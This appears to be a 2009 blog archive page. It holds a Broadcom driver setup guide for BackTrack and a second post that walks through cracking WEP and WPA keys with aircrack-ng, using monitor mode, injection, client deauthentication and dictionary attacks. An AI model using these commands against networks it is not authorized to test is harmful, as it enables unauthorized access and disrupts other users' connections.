Archive for wireless

How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10

Posted in BackTrack, Lenovo S10, Linux (Ubuntu) with tags , , , , , , , on September 25, 2009 by HydTech

This guide is adapted from Kazalku’s guide on remote exploit forums. Thanks Kazalku.

Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from here.

Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz

make -C /lib/modules/`uname -r`/build M=`pwd`

Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko

Now you should have the network Claimed. you can check by:
lshw -C network

Bring it up:
ifconfig eth1 up

To load the module upon boot:

cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl

Load the module at every startup:
kate /etc/modules

add the following and close the text editor:

Load NetworkManager and Configure KnetworkManager:
Type NetworkManager in a konsole and configure the wireless at the bottom right.

Delete the files you created in the root folder now that you dont need them.

Cracking WEP & WPA with IBM Lenovo X60 – Basics

Posted in BackTrack, fedora, Linux (Ubuntu), opensuse with tags , , , , , , , , , , on September 14, 2009 by HydTech

At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver.

Follow these steps for a succesful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check